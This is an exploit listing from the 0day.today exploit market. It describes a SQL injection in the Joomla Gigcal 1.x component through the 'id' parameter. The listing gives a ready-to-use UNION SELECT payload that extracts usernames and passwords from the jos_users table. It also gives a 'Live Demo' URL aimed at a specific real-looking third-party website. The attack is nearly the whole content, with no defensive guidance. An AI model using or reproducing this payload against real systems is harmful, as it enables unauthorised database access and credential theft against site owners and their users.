[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component Gigcal 1.x (id) SQL Injection Vulnerability

Author
Lanti-Net
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4697
Category
web applications
Date add
18-01-2009
Platform
unsorted
============================================================
Joomla Component Gigcal 1.x (id) SQL Injection Vulnerability
============================================================


*****************************************************************************
* 					 	                            *
*           Joomla Component Gigcal SQL Injection Vulnerability             *
*                           						    *
*****************************************************************************

***************************************
[=] Vulnerability found by: Lanti-Net
***************************************
[=] Exploit  : /index.php?option=com_gigcal&Itemid=78&id={SQL}
[=] Example  : /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
[=] Live Demo: http://www.fermaten.dk/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
***************************************




#  0day.today [2024-12-25]  #